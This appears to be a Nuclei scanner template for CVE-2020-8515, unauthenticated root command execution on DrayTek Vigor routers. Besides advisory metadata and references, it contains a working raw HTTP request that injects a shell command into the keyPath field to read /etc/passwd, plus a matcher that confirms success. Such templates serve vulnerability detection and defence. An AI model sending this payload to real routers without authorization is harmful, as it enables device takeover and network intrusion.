id: CVE-2020-8515 info: name: DrayTek - Remote Code Execution author: pikpikcu severity: critical description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected router, leading to complete compromise of the device and potential unauthorized access to the network. remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1. reference: - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8515 - https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-%28cve-2020-8515%29/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8515 cwe-id: CWE-78 epss-score: 0.97079 epss-percentile: 0.99723 cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* metadata: max-request: 1 vendor: draytek product: vigor2960_firmware tags: cve,cve2020,rce,kev,draytek http: - raw: - | POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: {{Hostname}} action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022040f06f4fb49a6b2f018ecabbc9e04600bcdd64f3b21b15c113c1373760d137a1022100d4e459f4713dc989c17fd1a5abfc9a27ba401bb8039f69cf8c3b9092d4906d5c:922c64590222798bb761d5b6d8e72950